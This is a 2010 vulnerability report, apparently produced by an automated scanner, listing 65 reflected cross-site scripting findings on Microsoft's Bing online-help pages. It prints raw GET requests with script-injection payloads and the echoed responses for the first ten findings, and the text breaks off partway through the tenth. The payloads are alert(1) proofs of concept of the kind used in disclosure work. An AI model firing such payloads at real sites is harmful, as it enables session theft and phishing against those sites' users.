Phishing, Insecure Configuration, XSS, Cross Site Scripting in onlinehelp.microsoft.com, CWE-79, CAPEC-86, DORK, GHDB

Web Property: onlinehelp.microsoft.com | BUG: Cross Site Scripting

Report generated by David Hoyt at Sun Nov 14 12:12:18 CST 2010.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. http://onlinehelp.microsoft.com/ar-sa/bing/ff808535(ar-sa).aspx [name of an arbitrarily supplied request parameter]

1.2. http://onlinehelp.microsoft.com/bg-BG/bing/ff808535(bg-BG).aspx [name of an arbitrarily supplied request parameter]

1.3. http://onlinehelp.microsoft.com/ca-ES/bing/ff808535(ca-ES).aspx [name of an arbitrarily supplied request parameter]

1.4. http://onlinehelp.microsoft.com/cs-CZ/bing/ff808535(cs-CZ).aspx [name of an arbitrarily supplied request parameter]

1.5. http://onlinehelp.microsoft.com/da-DK/bing/ff808535(da-DK).aspx [name of an arbitrarily supplied request parameter]

1.6. http://onlinehelp.microsoft.com/de-AT/bing/ff808535(de-AT).aspx [name of an arbitrarily supplied request parameter]

1.7. http://onlinehelp.microsoft.com/de-CH/bing/ff808535(de-CH).aspx [name of an arbitrarily supplied request parameter]

1.8. http://onlinehelp.microsoft.com/de-DE/bing/ff808535(de-DE).aspx [name of an arbitrarily supplied request parameter]

1.9. http://onlinehelp.microsoft.com/el-GR/bing/ff808535(el-GR).aspx [name of an arbitrarily supplied request parameter]

1.10. http://onlinehelp.microsoft.com/en-AU/bing/ff808535(en-AU).aspx [name of an arbitrarily supplied request parameter]

1.11. http://onlinehelp.microsoft.com/en-CA/bing/ff808535(en-CA).aspx [name of an arbitrarily supplied request parameter]

1.12. http://onlinehelp.microsoft.com/en-GB/bing/ff808535(en-GB).aspx [name of an arbitrarily supplied request parameter]

1.13. http://onlinehelp.microsoft.com/en-IE/bing/ff808535(en-IE).aspx [name of an arbitrarily supplied request parameter]

1.14. http://onlinehelp.microsoft.com/en-IN/bing/ff808535(en-IN).aspx [name of an arbitrarily supplied request parameter]

1.15. http://onlinehelp.microsoft.com/en-MY/bing/ff808535(en-MY).aspx [name of an arbitrarily supplied request parameter]

1.16. http://onlinehelp.microsoft.com/en-NZ/bing/ff808535(en-NZ).aspx [name of an arbitrarily supplied request parameter]

1.17. http://onlinehelp.microsoft.com/en-PH/bing/ff808535(en-PH).aspx [name of an arbitrarily supplied request parameter]

1.18. http://onlinehelp.microsoft.com/en-SG/bing/ff808535(en-SG).aspx [name of an arbitrarily supplied request parameter]

1.19. http://onlinehelp.microsoft.com/en-US/bing/ff808535(en-US).aspx [name of an arbitrarily supplied request parameter]

1.20. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [48d04">0d1903e336d parameter]

1.21. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]

1.22. http://onlinehelp.microsoft.com/en-ZA/bing/ff808535(en-ZA).aspx [name of an arbitrarily supplied request parameter]

1.23. http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx [48d04%22%3E%3Cscript%3Ealert(1)%3C/script%3E0d1903e336d parameter]

1.24. http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]

1.25. http://onlinehelp.microsoft.com/es-AR/bing/ff808535(es-AR).aspx [name of an arbitrarily supplied request parameter]

1.26. http://onlinehelp.microsoft.com/es-CL/bing/ff808535(es-CL).aspx [name of an arbitrarily supplied request parameter]

1.27. http://onlinehelp.microsoft.com/es-ES/bing/ff808535(es-ES).aspx [name of an arbitrarily supplied request parameter]

1.28. http://onlinehelp.microsoft.com/es-MX/bing/ff808535(es-MX).aspx [name of an arbitrarily supplied request parameter]

1.29. http://onlinehelp.microsoft.com/es-US/bing/ff808535(es-US).aspx [name of an arbitrarily supplied request parameter]

1.30. http://onlinehelp.microsoft.com/et-EE/bing/ff808535(et-EE).aspx [name of an arbitrarily supplied request parameter]

1.31. http://onlinehelp.microsoft.com/eu-es/bing/ff808535(eu-es).aspx [name of an arbitrarily supplied request parameter]

1.32. http://onlinehelp.microsoft.com/fi-FI/bing/ff808535(fi-FI).aspx [name of an arbitrarily supplied request parameter]

1.33. http://onlinehelp.microsoft.com/fr-BE/bing/ff808535(fr-BE).aspx [name of an arbitrarily supplied request parameter]

1.34. http://onlinehelp.microsoft.com/fr-CA/bing/ff808535(fr-CA).aspx [name of an arbitrarily supplied request parameter]

1.35. http://onlinehelp.microsoft.com/fr-CH/bing/ff808535(fr-CH).aspx [name of an arbitrarily supplied request parameter]

1.36. http://onlinehelp.microsoft.com/fr-FR/bing/ff808535(fr-FR).aspx [name of an arbitrarily supplied request parameter]

1.37. http://onlinehelp.microsoft.com/hr-HR/bing/ff808535(hr-HR).aspx [name of an arbitrarily supplied request parameter]

1.38. http://onlinehelp.microsoft.com/hu-HU/bing/ff808535(hu-HU).aspx [name of an arbitrarily supplied request parameter]

1.39. http://onlinehelp.microsoft.com/id-ID/bing/ff808535(id-ID).aspx [name of an arbitrarily supplied request parameter]

1.40. http://onlinehelp.microsoft.com/it-IT/bing/ff808535(it-IT).aspx [name of an arbitrarily supplied request parameter]

1.41. http://onlinehelp.microsoft.com/ja-JP/bing/ff808535(ja-JP).aspx [name of an arbitrarily supplied request parameter]

1.42. http://onlinehelp.microsoft.com/ko-KR/bing/ff808535(ko-KR).aspx [name of an arbitrarily supplied request parameter]

1.43. http://onlinehelp.microsoft.com/lt-LT/bing/ff808535(lt-LT).aspx [name of an arbitrarily supplied request parameter]

1.44. http://onlinehelp.microsoft.com/lv-LV/bing/ff808535(lv-LV).aspx [name of an arbitrarily supplied request parameter]

1.45. http://onlinehelp.microsoft.com/ms-MY/bing/ff808535(ms-MY).aspx [name of an arbitrarily supplied request parameter]

1.46. http://onlinehelp.microsoft.com/nb-NO/bing/ff808535(nb-NO).aspx [name of an arbitrarily supplied request parameter]

1.47. http://onlinehelp.microsoft.com/nl-BE/bing/ff808535(nl-BE).aspx [name of an arbitrarily supplied request parameter]

1.48. http://onlinehelp.microsoft.com/nl-NL/bing/ff808535(nl-NL).aspx [name of an arbitrarily supplied request parameter]

1.49. http://onlinehelp.microsoft.com/pl-PL/bing/ff808535(pl-PL).aspx [name of an arbitrarily supplied request parameter]

1.50. http://onlinehelp.microsoft.com/pt-BR/bing/ff808535(pt-BR).aspx [name of an arbitrarily supplied request parameter]

1.51. http://onlinehelp.microsoft.com/pt-PT/bing/ff808535(pt-PT).aspx [name of an arbitrarily supplied request parameter]

1.52. http://onlinehelp.microsoft.com/ro-RO/bing/ff808535(ro-RO).aspx [name of an arbitrarily supplied request parameter]

1.53. http://onlinehelp.microsoft.com/ru-RU/bing/ff808535(ru-RU).aspx [name of an arbitrarily supplied request parameter]

1.54. http://onlinehelp.microsoft.com/sk-SK/bing/ff808535(sk-SK).aspx [name of an arbitrarily supplied request parameter]

1.55. http://onlinehelp.microsoft.com/sl-SI/bing/ff808535(sl-SI).aspx [name of an arbitrarily supplied request parameter]

1.56. http://onlinehelp.microsoft.com/sr-Cyrl-CS/bing/ff808535(sr-Cyrl-CS).aspx [name of an arbitrarily supplied request parameter]

1.57. http://onlinehelp.microsoft.com/sr-Latn-CS/bing/ff808535(sr-Latn-CS).aspx [name of an arbitrarily supplied request parameter]

1.58. http://onlinehelp.microsoft.com/sv-SE/bing/ff808535(sv-SE).aspx [name of an arbitrarily supplied request parameter]

1.59. http://onlinehelp.microsoft.com/th-TH/bing/ff808535(th-TH).aspx [name of an arbitrarily supplied request parameter]

1.60. http://onlinehelp.microsoft.com/tr-TR/bing/ff808535(tr-TR).aspx [name of an arbitrarily supplied request parameter]

1.61. http://onlinehelp.microsoft.com/uk-UA/bing/ff808535(uk-UA).aspx [name of an arbitrarily supplied request parameter]

1.62. http://onlinehelp.microsoft.com/vi-VN/bing/ff808535(vi-VN).aspx [name of an arbitrarily supplied request parameter]

1.63. http://onlinehelp.microsoft.com/zh-CN/bing/ff808535(zh-CN).aspx [name of an arbitrarily supplied request parameter]

1.64. http://onlinehelp.microsoft.com/zh-HK/bing/ff808535(zh-HK).aspx [name of an arbitrarily supplied request parameter]

1.65. http://onlinehelp.microsoft.com/zh-TW/bing/ff808535(zh-TW).aspx [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 65 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://onlinehelp.microsoft.com/ar-sa/bing/ff808535(ar-sa).aspx [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /ar-sa/bing/ff808535(ar-sa).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16db4"><script>alert(1)</script>10054559ea6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ar-sa/bing/ff808535(ar-sa).aspx?16db4"><script>alert(1)</script>10054559ea6=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:16 GMT
Content-Length: 45924


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/ar-sa/bing/ff808535(en-us).aspx?16db4"><script>alert(1)</script>10054559ea6=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.2. http://onlinehelp.microsoft.com/bg-BG/bing/ff808535(bg-BG).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /bg-BG/bing/ff808535(bg-BG).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da18b"><script>alert(1)</script>7b29af310b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bg-BG/bing/ff808535(bg-BG).aspx?da18b"><script>alert(1)</script>7b29af310b0=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:13 GMT
Content-Length: 38581


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/bg-bg/bing/ff808535.aspx?da18b"><script>alert(1)</script>7b29af310b0=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.3. http://onlinehelp.microsoft.com/ca-ES/bing/ff808535(ca-ES).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /ca-ES/bing/ff808535(ca-ES).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58288"><script>alert(1)</script>2b0403f5053 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ca-ES/bing/ff808535(ca-ES).aspx?58288"><script>alert(1)</script>2b0403f5053=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:36 GMT
Content-Length: 44278


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/ca-es/bing/ff808535(en-us).aspx?58288"><script>alert(1)</script>2b0403f5053=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.4. http://onlinehelp.microsoft.com/cs-CZ/bing/ff808535(cs-CZ).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /cs-CZ/bing/ff808535(cs-CZ).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8129"><script>alert(1)</script>abd6c463af1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs-CZ/bing/ff808535(cs-CZ).aspx?a8129"><script>alert(1)</script>abd6c463af1=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:35 GMT
Content-Length: 38133


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/cs-cz/bing/ff808535.aspx?a8129"><script>alert(1)</script>abd6c463af1=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.5. http://onlinehelp.microsoft.com/da-DK/bing/ff808535(da-DK).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /da-DK/bing/ff808535(da-DK).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e24c8"><script>alert(1)</script>dced614872b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /da-DK/bing/ff808535(da-DK).aspx?e24c8"><script>alert(1)</script>dced614872b=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:36 GMT
Content-Length: 37871


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Hj%c3%a6lp&body=http://onlinehelp.microsoft.com/da-dk/bing/ff808535.aspx?e24c8"><script>alert(1)</script>dced614872b=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.6. http://onlinehelp.microsoft.com/de-AT/bing/ff808535(de-AT).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /de-AT/bing/ff808535(de-AT).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46485"><script>alert(1)</script>a55f0653042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /de-AT/bing/ff808535(de-AT).aspx?46485"><script>alert(1)</script>a55f0653042=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:42 GMT
Content-Length: 43569


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing-Hilfe&body=http://onlinehelp.microsoft.com/de-at/bing/ff808535.aspx?46485"><script>alert(1)</script>a55f0653042=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.7. http://onlinehelp.microsoft.com/de-CH/bing/ff808535(de-CH).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /de-CH/bing/ff808535(de-CH).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2141d"><script>alert(1)</script>cbd9d26e43f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /de-CH/bing/ff808535(de-CH).aspx?2141d"><script>alert(1)</script>cbd9d26e43f=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:35 GMT
Content-Length: 42502


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/de-ch/bing/ff808535.aspx?2141d"><script>alert(1)</script>cbd9d26e43f=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.8. http://onlinehelp.microsoft.com/de-DE/bing/ff808535(de-DE).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /de-DE/bing/ff808535(de-DE).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b06f"><script>alert(1)</script>63aec0582a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /de-DE/bing/ff808535(de-DE).aspx?9b06f"><script>alert(1)</script>63aec0582a7=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:03:35 GMT
Content-Length: 43086


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/de-de/bing/ff808535.aspx?9b06f"><script>alert(1)</script>63aec0582a7=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.9. http://onlinehelp.microsoft.com/el-GR/bing/ff808535(el-GR).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /el-GR/bing/ff808535(el-GR).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b87f4"><script>alert(1)</script>bae393b92bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /el-GR/bing/ff808535(el-GR).aspx?b87f4"><script>alert(1)</script>bae393b92bf=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:12 GMT
Content-Length: 38890


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/el-gr/bing/ff808535.aspx?b87f4"><script>alert(1)</script>bae393b92bf=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.10. http://onlinehelp.microsoft.com/en-AU/bing/ff808535(en-AU).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-AU/bing/ff808535(en-AU).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e969d"><script>alert(1)</script>54244c5efaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

